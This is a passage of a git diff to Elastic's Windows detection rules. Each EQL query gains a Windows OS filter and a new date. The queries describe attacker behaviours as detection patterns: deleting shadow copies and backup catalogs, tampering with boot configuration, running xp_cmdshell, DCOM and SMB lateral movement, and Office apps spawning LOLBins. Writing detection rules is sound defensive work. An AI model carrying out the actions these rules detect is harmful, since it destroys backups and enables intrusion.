"production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -77,7 +77,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and process.parent.name : ("AcroRd32.exe", "Acrobat.exe", "FoxitPhantomPDF.exe", diff --git a/rules/windows/execution_suspicious_powershell_imgload.toml b/rules/windows/execution_suspicious_powershell_imgload.toml index 4112626eb..5b129a442 100644 --- a/rules/windows/execution_suspicious_powershell_imgload.toml +++ b/rules/windows/execution_suspicious_powershell_imgload.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -90,7 +90,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -any where (event.category : ("library", "driver") or (event.category == "process" and event.action : "Image loaded*")) and +any where host.os.type == "windows" and (event.category : ("library", "driver") or (event.category == "process" and event.action : "Image loaded*")) and (dll.name : ("System.Management.Automation.ni.dll", "System.Management.Automation.dll") or file.name : ("System.Management.Automation.ni.dll", "System.Management.Automation.dll")) and diff --git a/rules/windows/execution_suspicious_psexesvc.toml b/rules/windows/execution_suspicious_psexesvc.toml index 8602dc443..2b192ea31 100644 --- a/rules/windows/execution_suspicious_psexesvc.toml +++ b/rules/windows/execution_suspicious_psexesvc.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/02/06" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -60,7 +60,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and process.pe.original_file_name : "psexesvc.exe" and not process.name : "PSEXESVC.exe" ''' diff --git a/rules/windows/execution_via_compiled_html_file.toml b/rules/windows/execution_via_compiled_html_file.toml index a925b6d82..aee5002a3 100644 --- a/rules/windows/execution_via_compiled_html_file.toml +++ b/rules/windows/execution_via_compiled_html_file.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/02/09" +updated_date = "2023/03/02" [rule] author = ["Elastic"] @@ -94,7 +94,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and process.parent.name : "hh.exe" and process.name : ("mshta.exe", "cmd.exe", "powershell.exe", "pwsh.exe", "powershell_ise.exe", "cscript.exe", "wscript.exe") ''' diff --git a/rules/windows/execution_via_hidden_shell_conhost.toml b/rules/windows/execution_via_hidden_shell_conhost.toml index 7d711838e..84db8fc88 100644 --- a/rules/windows/execution_via_hidden_shell_conhost.toml +++ b/rules/windows/execution_via_hidden_shell_conhost.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -80,7 +80,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and process.name : "conhost.exe" and process.parent.name : ("lsass.exe", "services.exe", "smss.exe", "winlogon.exe", "explorer.exe", "dllhost.exe", "rundll32.exe", "regsvr32.exe", "userinit.exe", "wininit.exe", "spoolsv.exe", "ctfmon.exe") and diff --git a/rules/windows/execution_via_xp_cmdshell_mssql_stored_procedure.toml b/rules/windows/execution_via_xp_cmdshell_mssql_stored_procedure.toml index b3c81ff9f..3e599d42d 100644 --- a/rules/windows/execution_via_xp_cmdshell_mssql_stored_procedure.toml +++ b/rules/windows/execution_via_xp_cmdshell_mssql_stored_procedure.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -63,7 +63,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and process.name : "cmd.exe" and process.parent.name : "sqlservr.exe" and not process.args : ("\\\\*", "diskfree", "rmdir", "mkdir", "dir", "del", "rename", "bcp", "*XMLNAMESPACES*", "?:\\MSSQL\\Backup\\Jobs\\sql_agent_backup_job.ps1", "K:\\MSSQL\\Backup\\msdb", "K:\\MSSQL\\Backup\\Logins") diff --git a/rules/windows/impact_backup_file_deletion.toml b/rules/windows/impact_backup_file_deletion.toml index 21cdc734d..c29cb3dd7 100644 --- a/rules/windows/impact_backup_file_deletion.toml +++ b/rules/windows/impact_backup_file_deletion.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -72,7 +72,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -file where event.type == "deletion" and +file where host.os.type == "windows" and event.type == "deletion" and ( /* Veeam Related Backup Files */ (file.extension : ("VBK", "VIB", "VBM") and diff --git a/rules/windows/impact_deleting_backup_catalogs_with_wbadmin.toml b/rules/windows/impact_deleting_backup_catalogs_with_wbadmin.toml index f8c61c521..f4bd7bb07 100644 --- a/rules/windows/impact_deleting_backup_catalogs_with_wbadmin.toml +++ b/rules/windows/impact_deleting_backup_catalogs_with_wbadmin.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -68,7 +68,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and (process.name : "wbadmin.exe" or process.pe.original_file_name == "WBADMIN.EXE") and process.args : "catalog" and process.args : "delete" ''' diff --git a/rules/windows/impact_modification_of_boot_config.toml b/rules/windows/impact_modification_of_boot_config.toml index 10c0f2341..125fe5dad 100644 --- a/rules/windows/impact_modification_of_boot_config.toml +++ b/rules/windows/impact_modification_of_boot_config.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -68,7 +68,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and (process.name : "bcdedit.exe" or process.pe.original_file_name == "bcdedit.exe") and ( (process.args : "/set" and process.args : "bootstatuspolicy" and process.args : "ignoreallfailures") or diff --git a/rules/windows/impact_stop_process_service_threshold.toml b/rules/windows/impact_stop_process_service_threshold.toml index ffc25cd17..aa8434526 100644 --- a/rules/windows/impact_stop_process_service_threshold.toml +++ b/rules/windows/impact_stop_process_service_threshold.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -56,7 +56,7 @@ tags = ["Elastic", "Host", "Windows", "Threat Detection", "Impact", "Investigati type = "threshold" query = ''' -event.category:process and event.type:start and process.name:(net.exe or sc.exe or taskkill.exe) and +event.category:process and host.os.type:windows and event.type:start and process.name:(net.exe or sc.exe or taskkill.exe) and process.args:(stop or pause or delete or "/PID" or "/IM" or "/T" or "/F" or "/t" or "/f" or "/im" or "/pid") ''' diff --git a/rules/windows/impact_volume_shadow_copy_deletion_or_resized_via_vssadmin.toml b/rules/windows/impact_volume_shadow_copy_deletion_or_resized_via_vssadmin.toml index 745b0ad86..2722ab1c4 100644 --- a/rules/windows/impact_volume_shadow_copy_deletion_or_resized_via_vssadmin.toml +++ b/rules/windows/impact_volume_shadow_copy_deletion_or_resized_via_vssadmin.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -87,7 +87,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" +process where host.os.type == "windows" and event.type == "start" and (process.name : "vssadmin.exe" or process.pe.original_file_name == "VSSADMIN.EXE") and process.args in ("delete", "resize") and process.args : "shadows*" ''' diff --git a/rules/windows/impact_volume_shadow_copy_deletion_via_powershell.toml b/rules/windows/impact_volume_shadow_copy_deletion_via_powershell.toml index 9a6a99a24..2044d8ed1 100644 --- a/rules/windows/impact_volume_shadow_copy_deletion_via_powershell.toml +++ b/rules/windows/impact_volume_shadow_copy_deletion_via_powershell.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic", "Austin Songer"] @@ -91,7 +91,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and process.name : ("powershell.exe", "pwsh.exe", "powershell_ise.exe") and process.args : ("*Get-WmiObject*", "*gwmi*", "*Get-CimInstance*", "*gcim*") and process.args : ("*Win32_ShadowCopy*") and diff --git a/rules/windows/impact_volume_shadow_copy_deletion_via_wmic.toml b/rules/windows/impact_volume_shadow_copy_deletion_via_wmic.toml index 9bd1c1315..b20d13588 100644 --- a/rules/windows/impact_volume_shadow_copy_deletion_via_wmic.toml +++ b/rules/windows/impact_volume_shadow_copy_deletion_via_wmic.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -87,7 +87,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and (process.name : "WMIC.exe" or process.pe.original_file_name == "wmic.exe") and process.args : "delete" and process.args : "shadowcopy" ''' diff --git a/rules/windows/initial_access_evasion_suspicious_htm_file_creation.toml b/rules/windows/initial_access_evasion_suspicious_htm_file_creation.toml index 09274abdd..e4e7ce35b 100644 --- a/rules/windows/initial_access_evasion_suspicious_htm_file_creation.toml +++ b/rules/windows/initial_access_evasion_suspicious_htm_file_creation.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -29,7 +29,7 @@ type = "eql" query = ''' sequence by user.id with maxspan=5m - [file where event.action in ("creation", "rename") and + [file where host.os.type == "windows" and event.action in ("creation", "rename") and file.extension : ("htm", "html") and file.path : ("?:\\Users\\*\\Downloads\\*", "?:\\Users\\*\\Content.Outlook\\*", @@ -37,7 +37,7 @@ sequence by user.id with maxspan=5m "?:\\Users\\*\\AppData\\Local\\Temp\\7z*", "?:\\Users\\*\\AppData\\Local\\Temp\\Rar$*") and ((file.Ext.entropy >= 5 and file.size >= 150000) or file.size >= 1000000)] - [process where event.action == "start" and + [process where host.os.type == "windows" and event.action == "start" and ( (process.name in ("chrome.exe", "msedge.exe", "brave.exe", "whale.exe", "browser.exe", "dragon.exe", "vivaldi.exe", "opera.exe") and process.args == "--single-argument") or diff --git a/rules/windows/initial_access_script_executing_powershell.toml b/rules/windows/initial_access_script_executing_powershell.toml index e98f0dbe1..ed26baf49 100644 --- a/rules/windows/initial_access_script_executing_powershell.toml +++ b/rules/windows/initial_access_script_executing_powershell.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -79,7 +79,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and process.parent.name : ("cscript.exe", "wscript.exe") and process.name : "powershell.exe" ''' diff --git a/rules/windows/initial_access_scripts_process_started_via_wmi.toml b/rules/windows/initial_access_scripts_process_started_via_wmi.toml index d67dba175..3cf4009d8 100644 --- a/rules/windows/initial_access_scripts_process_started_via_wmi.toml +++ b/rules/windows/initial_access_scripts_process_started_via_wmi.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/02/07" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -25,9 +25,9 @@ type = "eql" query = ''' sequence by host.id with maxspan = 5s - [any where (event.category == "library" or (event.category == "process" and event.action : "Image loaded*")) and + [any where host.os.type == "windows" and (event.category == "library" or (event.category == "process" and event.action : "Image loaded*")) and (dll.name : "wmiutils.dll" or file.name : "wmiutils.dll") and process.name : ("wscript.exe", "cscript.exe")] - [process where event.type == "start" and + [process where host.os.type == "windows" and event.type == "start" and process.parent.name : "wmiprvse.exe" and user.domain != "NT AUTHORITY" and (process.pe.original_file_name : diff --git a/rules/windows/initial_access_suspicious_ms_exchange_files.toml b/rules/windows/initial_access_suspicious_ms_exchange_files.toml index de1528346..8d0354881 100644 --- a/rules/windows/initial_access_suspicious_ms_exchange_files.toml +++ b/rules/windows/initial_access_suspicious_ms_exchange_files.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic", "Austin Songer"] @@ -53,7 +53,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -file where event.type == "creation" and +file where host.os.type == "windows" and event.type == "creation" and process.name : ("UMWorkerProcess.exe", "umservice.exe") and file.extension : ("php", "jsp", "js", "aspx", "asmx", "asax", "cfm", "shtml") and ( diff --git a/rules/windows/initial_access_suspicious_ms_exchange_process.toml b/rules/windows/initial_access_suspicious_ms_exchange_process.toml index a6c284bc9..7963790b2 100644 --- a/rules/windows/initial_access_suspicious_ms_exchange_process.toml +++ b/rules/windows/initial_access_suspicious_ms_exchange_process.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic", "Austin Songer"] @@ -39,7 +39,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and process.parent.name : ("UMService.exe", "UMWorkerProcess.exe") and not process.executable : ("?:\\Windows\\System32\\werfault.exe", diff --git a/rules/windows/initial_access_suspicious_ms_exchange_worker_child_process.toml b/rules/windows/initial_access_suspicious_ms_exchange_worker_child_process.toml index cfcbee974..056438128 100644 --- a/rules/windows/initial_access_suspicious_ms_exchange_worker_child_process.toml +++ b/rules/windows/initial_access_suspicious_ms_exchange_worker_child_process.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -34,7 +34,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and process.parent.name : "w3wp.exe" and process.parent.args : "MSExchange*AppPool" and (process.name : ("cmd.exe", "powershell.exe", "pwsh.exe", "powershell_ise.exe") or process.pe.original_file_name in ("cmd.exe", "powershell.exe", "pwsh.dll", "powershell_ise.exe")) diff --git a/rules/windows/initial_access_suspicious_ms_office_child_process.toml b/rules/windows/initial_access_suspicious_ms_office_child_process.toml index d892565f3..9dcc862bd 100644 --- a/rules/windows/initial_access_suspicious_ms_office_child_process.toml +++ b/rules/windows/initial_access_suspicious_ms_office_child_process.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/02/07" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -78,7 +78,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and process.parent.name : ("eqnedt32.exe", "excel.exe", "fltldr.exe", "msaccess.exe", "mspub.exe", "powerpnt.exe", "winword.exe", "outlook.exe") and process.name : ("Microsoft.Workflow.Compiler.exe", "arp.exe", "atbroker.exe", "bginfo.exe", "bitsadmin.exe", "cdb.exe", "certutil.exe", "cmd.exe", "cmstp.exe", "control.exe", "cscript.exe", "csi.exe", "dnx.exe", "dsget.exe", "dsquery.exe", "forfiles.exe", diff --git a/rules/windows/initial_access_suspicious_ms_outlook_child_process.toml b/rules/windows/initial_access_suspicious_ms_outlook_child_process.toml index 879c9a3f9..b37494da6 100644 --- a/rules/windows/initial_access_suspicious_ms_outlook_child_process.toml +++ b/rules/windows/initial_access_suspicious_ms_outlook_child_process.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -76,7 +76,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and process.parent.name : "outlook.exe" and process.name : ("Microsoft.Workflow.Compiler.exe", "arp.exe", "atbroker.exe", "bginfo.exe", "bitsadmin.exe", "cdb.exe", "certutil.exe", "cmd.exe", "cmstp.exe", "cscript.exe", "csi.exe", "dnx.exe", "dsget.exe", diff --git a/rules/windows/initial_access_unusual_dns_service_children.toml b/rules/windows/initial_access_unusual_dns_service_children.toml index 6a27b25f1..a7ddd566e 100644 --- a/rules/windows/initial_access_unusual_dns_service_children.toml +++ b/rules/windows/initial_access_unusual_dns_service_children.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -78,7 +78,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and process.parent.name : "dns.exe" and +process where host.os.type == "windows" and event.type == "start" and process.parent.name : "dns.exe" and not process.name : "conhost.exe" ''' diff --git a/rules/windows/initial_access_unusual_dns_service_file_writes.toml b/rules/windows/initial_access_unusual_dns_service_file_writes.toml index db3960a7a..c61fb725f 100644 --- a/rules/windows/initial_access_unusual_dns_service_file_writes.toml +++ b/rules/windows/initial_access_unusual_dns_service_file_writes.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/01/30" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -41,7 +41,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -file where process.name : "dns.exe" and event.type in ("creation", "deletion", "change") and +file where host.os.type == "windows" and process.name : "dns.exe" and event.type in ("creation", "deletion", "change") and not file.name : "dns.log" and not (file.extension : ("old", "temp", "bak", "dns", "arpa") and file.path : "C:\\Windows\\System32\\dns\\*") ''' diff --git a/rules/windows/initial_access_via_explorer_suspicious_child_parent_args.toml b/rules/windows/initial_access_via_explorer_suspicious_child_parent_args.toml index 52e495f3e..e4650185f 100644 --- a/rules/windows/initial_access_via_explorer_suspicious_child_parent_args.toml +++ b/rules/windows/initial_access_via_explorer_suspicious_child_parent_args.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -29,7 +29,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and ( process.name : ("cscript.exe", "wscript.exe", "powershell.exe", "rundll32.exe", "cmd.exe", "mshta.exe", "regsvr32.exe") or process.pe.original_file_name in ("cscript.exe", "wscript.exe", "PowerShell.EXE", "RUNDLL32.EXE", "Cmd.Exe", "MSHTA.EXE", "REGSVR32.EXE") diff --git a/rules/windows/lateral_movement_cmd_service.toml b/rules/windows/lateral_movement_cmd_service.toml index 3374da4d1..e7191974e 100644 --- a/rules/windows/lateral_movement_cmd_service.toml +++ b/rules/windows/lateral_movement_cmd_service.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -25,11 +25,11 @@ type = "eql" query = ''' sequence by process.entity_id with maxspan = 1m - [process where event.type == "start" and + [process where host.os.type == "windows" and event.type == "start" and (process.name : "sc.exe" or process.pe.original_file_name : "sc.exe") and process.args : "\\\\*" and process.args : ("binPath=*", "binpath=*") and process.args : ("create", "config", "failure", "start")] - [network where process.name : "sc.exe" and destination.ip != "127.0.0.1"] + [network where host.os.type == "windows" and process.name : "sc.exe" and destination.ip != "127.0.0.1"] ''' diff --git a/rules/windows/lateral_movement_dcom_hta.toml b/rules/windows/lateral_movement_dcom_hta.toml index 1c72492fb..a5466c835 100644 --- a/rules/windows/lateral_movement_dcom_hta.toml +++ b/rules/windows/lateral_movement_dcom_hta.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -27,10 +27,10 @@ type = "eql" query = ''' sequence with maxspan=1m - [process where event.type == "start" and + [process where host.os.type == "windows" and event.type == "start" and process.name : "mshta.exe" and process.args : "-Embedding" ] by host.id, process.entity_id - [network where event.type == "start" and process.name : "mshta.exe" and + [network where host.os.type == "windows" and event.type == "start" and process.name : "mshta.exe" and network.direction : ("incoming", "ingress") and network.transport == "tcp" and source.port > 49151 and destination.port > 49151 and source.ip != "127.0.0.1" and source.ip != "::1" ] by host.id, process.entity_id diff --git a/rules/windows/lateral_movement_dcom_mmc20.toml b/rules/windows/lateral_movement_dcom_mmc20.toml index eef975b11..c3f2299c6 100644 --- a/rules/windows/lateral_movement_dcom_mmc20.toml +++ b/rules/windows/lateral_movement_dcom_mmc20.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -27,11 +27,11 @@ type = "eql" query = ''' sequence by host.id with maxspan=1m - [network where event.type == "start" and process.name : "mmc.exe" and source.port >= 49152 and + [network where host.os.type == "windows" and event.type == "start" and process.name : "mmc.exe" and source.port >= 49152 and destination.port >= 49152 and source.ip != "127.0.0.1" and source.ip != "::1" and network.direction : ("incoming", "ingress") and network.transport == "tcp" ] by process.entity_id - [process where event.type == "start" and process.parent.name : "mmc.exe" + [process where host.os.type == "windows" and event.type == "start" and process.parent.name : "mmc.exe" ] by process.parent.entity_id ''' diff --git a/rules/windows/lateral_movement_dcom_shellwindow_shellbrowserwindow.toml b/rules/windows/lateral_movement_dcom_shellwindow_shellbrowserwindow.toml index c4bdd1edd..6524c2568 100644 --- a/rules/windows/lateral_movement_dcom_shellwindow_shellbrowserwindow.toml +++ b/rules/windows/lateral_movement_dcom_shellwindow_shellbrowserwindow.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -27,11 +27,11 @@ type = "eql" query = ''' sequence by host.id with maxspan=5s - [network where event.type == "start" and process.name : "explorer.exe" and + [network where host.os.type == "windows" and event.type == "start" and process.name : "explorer.exe" and network.direction : ("incoming", "ingress") and network.transport == "tcp" and source.port > 49151 and destination.port > 49151 and source.ip != "127.0.0.1" and source.ip != "::1" ] by process.entity_id - [process where event.type == "start" and + [process where host.os.type == "windows" and event.type == "start" and process.parent.name : "explorer.exe" ] by process.parent.entity_id ''' diff --git a/rules/windows/lateral_movement_defense_evasion_lanman_nullsessionpipe_modification.toml b/rules/windows/lateral_movement_defense_evasion_lanman_nullsessionpipe_modification.toml index 157565a62..f949a3667 100644 --- a/rules/windows/lateral_movement_defense_evasion_lanman_nullsessionpipe_modification.toml +++ b/rules/windows/lateral_movement_defense_evasion_lanman_nullsessionpipe_modification.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -29,7 +29,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -registry where event.type in ("creation", "change") and +registry where host.os.type == "windows" and event.type in ("creation", "change") and registry.path : "HKLM\\SYSTEM\\*ControlSet*\\services\\LanmanServer\\Parameters\\NullSessionPipes" and length(registry.data.strings) > 0 ''' diff --git a/rules/windows/lateral_movement_direct_outbound_smb_connection.toml b/rules/windows/lateral_movement_direct_outbound_smb_connection.toml index 5d70c0beb..7d9a1b33b 100644 --- a/rules/windows/lateral_movement_direct_outbound_smb_connection.toml +++ b/rules/windows/lateral_movement_direct_outbound_smb_connection.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2023/01/31" +updated_date = "2023/02/22" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" @@ -76,7 +76,7 @@ type = "eql" query = ''' sequence by process.entity_id - [process where event.type == "start" and host.os.name == "Windows" and process.pid != 4 and + [process where host.os.type == "windows" and event.type == "start" and process.pid != 4 and not (process.executable : "D:\\EnterpriseCare\\tools\\jre.1\\bin\\java.exe" and process.args : "com.emeraldcube.prism.launcher.Invoker") and not (process.executable : "C:\\Docusnap 11\\Tools\\nmap\\nmap.exe" and process.args : "smb-os-discovery.nse") and not process.executable : @@ -89,7 +89,7 @@ sequence by process.entity_id "?:\\Program Files\\uptime software\\uptime\\UptimeDataCollector.exe", "?:\\Program Files\\CloudMatters\\auvik\\AuvikAgentService.exe", "?:\\Program Files\\Rumble\\rumble-agent-*.exe")] - [network where destination.port == 445 and process.pid != 4 and + [network where host.os.type == "windows" and destination.port == 445 and process.pid != 4 and not cidrmatch(destination.ip, "127.0.0.1", "::1")] ''' diff --git a/rules/windows/lateral_movement_evasion_rdp_shadowing.toml b/rules/windows/lateral_movement_evasion_rdp_shadowing.toml index 5d26dfbbb..58c60569d 100644 --- a/rules/windows/lateral_movement_evasion_rdp_shadowing.toml +++ b/rules/windows/lateral_movement_evasion_rdp_shadowing.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -37,7 +37,7 @@ query = ''' /* Identifies the modification of RDP Shadow registry or the execution of processes indicative of active shadow RDP session */ -any where +any where host.os.type == "windows" and (event.category == "registry" and registry.path : "HKLM\\Software\\Policies\\Microsoft\\Windows NT\\Terminal Services\\Shadow" ) or diff --git a/rules/windows/lateral_movement_executable_tool_transfer_smb.toml b/rules/windows/lateral_movement_executable_tool_transfer_smb.toml index c404504fc..9b6692e2b 100644 --- a/rules/windows/lateral_movement_executable_tool_transfer_smb.toml +++ b/rules/windows/lateral_movement_executable_tool_transfer_smb.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -66,12 +66,12 @@ type = "eql" query = ''' sequence by host.id with maxspan=30s - [network where event.type == "start" and process.pid == 4 and destination.port == 445 and + [network where host.os.type == "windows" and event.type == "start" and process.pid == 4 and destination.port == 445 and network.direction : ("incoming", "ingress") and network.transport == "tcp" and source.ip != "127.0.0.1" and source.ip != "::1" ] by process.entity_id /* add more executable extensions here if they are not noisy in your environment */ - [file where event.type in ("creation", "change") and process.pid == 4 and file.extension : ("exe", "dll", "bat", "cmd")] by process.entity_id + [file where host.os.type == "windows" and event.type in ("creation", "change") and process.pid == 4 and file.extension : ("exe", "dll", "bat", "cmd")] by process.entity_id ''' diff --git a/rules/windows/lateral_movement_execution_from_tsclient_mup.toml b/rules/windows/lateral_movement_execution_from_tsclient_mup.toml index d8c8c4798..22514535c 100644 --- a/rules/windows/lateral_movement_execution_from_tsclient_mup.toml +++ 